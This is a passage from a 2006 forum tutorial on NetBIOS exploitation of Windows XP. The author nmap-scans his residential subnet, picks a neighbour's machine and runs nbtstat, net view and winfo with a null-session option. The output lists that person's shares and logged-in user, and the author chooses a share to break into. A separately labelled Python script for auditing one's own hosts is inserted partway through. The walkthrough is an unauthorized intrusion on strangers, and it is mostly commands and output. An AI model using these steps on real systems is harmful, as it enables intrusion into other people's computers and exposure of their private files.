QUICK AND SIMPLE NETBIOS EXPLOITATION WITH WINDOWS XP CONT...
Right, so for the scope of our paper the above target will be considered
'secure' and we move on to easier pickings... back to nmap!
I find it easier either to use the -oN switch (which writes nmap's normal
output to a file) or to right-click the top of the command prompt window
and go to Properties. Once there, increase the screen buffer size so that
you can scroll upwards in the command prompt; otherwise you may not be
able to view the entire output.
The best results for this type of crack are usually found in a
residential subnet of IP addresses. How do you find one of those? If
you're at home, chances are you are in a residential subnet! Take a look
at your own IP and use that. When I ran this scan my IP was in the
86.132.223.x range, so I scanned that.
Code:
nmap -sS -P0 -v 86.132.223.0-255 -p 139,445
The results for open ports came back as:
Code:
Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227
OK, so now we have a whole host of my neighbours to connect to!
Let's choose an IP!
Hmmmmmm... 86.132.223.178 I think!
So open up a command prompt and type:
Code:
H:\>nbtstat -a 86.132.223.178
Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []
Host not found.
Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    OFFICE         <00>  UNIQUE      Registered
    MSHOME         <00>  GROUP       Registered
    OFFICE         <20>  UNIQUE      Registered
    MSHOME         <1E>  GROUP       Registered
    MAC Address = 00-53-45-00-00-00
OK, so we now have the NetBIOS table and the MAC address. We take a look
to see if the File Sharing Service is active: the <20> UNIQUE entry is
the File Server service. Yep, it is.
So now, as we know, we issue the net view command to get a list of the
shares...
Code:
H:\>net view 86.132.223.178
Shared resources at 86.132.223.178
OFFICE
Share name       Type   Used as  Comment
-------------------------------------------------------------------------------
bramford photos  Disk
BrotherD         Print           Brother DCP-340CW USB Printer
BrotherD.2       Print           BRN_759F2E
johns            Disk
PaperPor         Print           PaperPort Black & White Image
PaperPor.2       Print           PaperPort Color Image
Printer          Print           Imprimante Fax Olitec
Printer4         Print           ProgeSOFT PDF Wizard
Printer7         Print           Net-It Now! SE for Pressworks
Printer9         Print           EPSON PictureMate
SharedDocs       Disk
SLAVE (D)        Disk
The command completed successfully.
Holy Shit! Look at all those shares.
Now open up a new command prompt and give the following command:
Code:
H:\>winfo 86.132.223.178 -v
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
SYSTEM INFORMATION:
- OS version: 5.1
DOMAIN INFORMATION:
- Primary domain (legacy): MSHOME
- Account domain: OFFICE
- Primary domain: MSHOME
- DNS name for primary domain:
- Forest DNS name for primary domain:
PASSWORD POLICY:
Warning: Unable to retrieve password policy.
Reason : Access denied.
LOCOUT POLICY:
Warning: Unable to retrieve lockout policy.
Reason : Access denied.
SESSIONS:
Warning: Unable to retrieve sessions.
Reason : Access denied.
LOGGED IN USERS:
* OFFICE$
* vernon cooper
USER ACCOUNTS:
Warning: Unable to enumerate users.
Reason : Access denied.
WORKSTATION TRUST ACCOUNTS:
Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.
INTERDOMAIN TRUST ACCOUNTS:
Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.
SERVER TRUST ACCOUNTS:
Warning: Unable to enumerate server trust accounts.
Reason : Access denied.
SHARES:
* IPC$
- Type: Unknown
- Remark: Remote IPC
* print$
- Type: Disk drive
- Remark: Printer Drivers
* SharedDocs
- Type: Disk drive
- Remark:
* johns
- Type: Disk drive
- Remark:
* PaperPor.2
- Type: Print queue
- Remark: PaperPort Color Image
* Printer7
- Type: Print queue
- Remark: Net-It Now! SE for Pressworks
* SLAVE (D)
- Type: Disk drive
- Remark:
* Printer4
- Type: Print queue
- Remark: ProgeSOFT PDF Wizard
* PaperPor
- Type: Print queue
- Remark: PaperPort Black & White Image
* BrotherD.2
- Type: Print queue
- Remark: BRN_759F2E
* bramford photos
- Type: Disk drive
- Remark:
* Printer9
- Type: Print queue
- Remark: EPSON PictureMate
* Printer
- Type: Print queue
- Remark: Imprimante Fax Olitec
* BrotherD
- Type: Print queue
- Remark: Brother DCP-340CW USB Printer
As you can see, winfo gives us all the shares in an easier-to-read
layout. You can put -n at the end of the winfo command to establish a
null session if issuing the command without it does not work.
OK, let's pick a share... mmmm... johns looks good.
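The three outputs walked through above (nmap's "Discovered open port" lines, the nbtstat -a name table and the net view share list) are exactly what an administrator should capture against their own machines to see what a Windows XP host advertises to the rest of its subnet. As an added example, not part of the original tutorial, the following Python script parses those three outputs and turns them into an exposure report: which hosts answer on 139/445, whether the <20> File Server service is registered, and which of the listed shares are disk shares rather than print queues. The sample outputs are constructed (addresses are in the 192.0.2.0/24 documentation range; the share names follow the listing above) and the suffix table is the standard NetBIOS name-suffix list.

```python
"""Turn captured nmap, nbtstat -a and net view output from your own hosts
into a NetBIOS/SMB exposure report (added example, not from the tutorial)."""
import re
from dataclasses import dataclass, field

# Standard NetBIOS name-suffix meanings for the entries nbtstat -a shows.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service (host name)",
    ("00", "GROUP"): "Workgroup or domain name",
    ("03", "UNIQUE"): "Messenger Service",
    ("20", "UNIQUE"): "File Server Service (file and printer sharing on)",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service elections",
}

NMAP_LINE = re.compile(r"Discovered open port (\d+)/tcp on (\S+)")
NBT_ROW = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
SHARE_ROW = re.compile(r"^(\S.*?)\s{2,}(Disk|Print|IPC)\b\s*(.*)$")

def exposed_hosts(nmap_text, ports=(139, 445)):
    """host -> sorted list of the interesting ports nmap reported open."""
    found = {}
    for port, host in NMAP_LINE.findall(nmap_text):
        if int(port) in ports:
            found.setdefault(host, set()).add(int(port))
    return {h: sorted(p) for h, p in found.items()}

def parse_nbtstat(text):
    """(name, suffix, kind, status) rows from the Remote Machine Name Table."""
    return [(m.group(1).strip(), m.group(2).upper(), m.group(3), m.group(4))
            for m in map(NBT_ROW.match, text.splitlines()) if m]

def parse_net_view(text):
    """(share, type, comment) rows from net view output."""
    return [(m.group(1).strip(), m.group(2), m.group(3).strip())
            for m in map(SHARE_ROW.match, text.splitlines()) if m]

@dataclass
class ExposureReport:
    host_name: str = ""
    workgroup: str = ""
    file_sharing_advertised: bool = False
    disk_shares: list = field(default_factory=list)
    print_shares: list = field(default_factory=list)

def audit(nbtstat_text, net_view_text):
    """Combine the name table and the share list into one report."""
    rep = ExposureReport()
    for name, suffix, kind, status in parse_nbtstat(nbtstat_text):
        if status != "Registered":
            continue
        if (suffix, kind) == ("00", "UNIQUE"):
            rep.host_name = name
        elif (suffix, kind) == ("00", "GROUP"):
            rep.workgroup = name
        elif (suffix, kind) == ("20", "UNIQUE"):
            rep.file_sharing_advertised = True   # the <20> entry checked above
    for share, kind, _comment in parse_net_view(net_view_text):
        if kind == "Disk":
            rep.disk_shares.append(share)
        elif kind == "Print":
            rep.print_shares.append(share)
    return rep

def findings(rep):
    """Plain-language findings an administrator can act on."""
    out = []
    if rep.file_sharing_advertised:
        out.append(f"{rep.host_name} ({rep.workgroup}) registers <20>: "
                   "File Server service reachable on TCP 139/445")
    if rep.disk_shares:
        out.append("Disk shares listed by net view: " + ", ".join(rep.disk_shares))
    if out:
        out.append("Mitigation: disable File and Printer Sharing on the interface, "
                   "or block TCP 139/445 at the host or edge firewall, unless "
                   "sharing with this subnet is intended.")
    return out

# Constructed sample outputs (documentation-range addresses, not real hosts).
NMAP_SAMPLE = """\
Discovered open port 139/tcp on 192.0.2.96
Discovered open port 139/tcp on 192.0.2.124
Discovered open port 445/tcp on 192.0.2.124
Discovered open port 80/tcp on 192.0.2.124
"""
NBTSTAT_SAMPLE = """\
Wireless Network Connection 3:
Node IpAddress: [192.0.2.6] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    OFFICE         <00>  UNIQUE      Registered
    MSHOME         <00>  GROUP       Registered
    OFFICE         <20>  UNIQUE      Registered
    MSHOME         <1E>  GROUP       Registered
    MAC Address = 00-53-45-00-00-00
"""
NET_VIEW_SAMPLE = """\
Shared resources at 192.0.2.10
Share name       Type   Used as  Comment
-------------------------------------------------------------------------------
bramford photos  Disk
BrotherD         Print           Brother DCP-340CW USB Printer
johns            Disk
Printer4         Print           ProgeSOFT PDF Wizard
SharedDocs       Disk
SLAVE (D)        Disk
The command completed successfully.
"""

if __name__ == "__main__":
    print("hosts with 139/445 open:", exposed_hosts(NMAP_SAMPLE))
    for line in findings(audit(NBTSTAT_SAMPLE, NET_VIEW_SAMPLE)):
        print("-", line)
```

Run it against output you have saved from your own hosts; the share regex relies on the two-or-more-space column gap that net view prints, so share names containing a single space (such as "bramford photos") survive intact.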
Original Tutorial by
nokia for TheTAZZone-TAZForum
Originally posted on September 20th, 2006 here
Do not use, republish, in whole or in part, without the consent of
the Author. TheTAZZone policy is that Authors retain the rights to the
work they submit and/or post...we do not sell, publish, transmit, or
have the right to give permission for such...TheTAZZone merely retains
the right to use, retain, and publish submitted work within its
Network.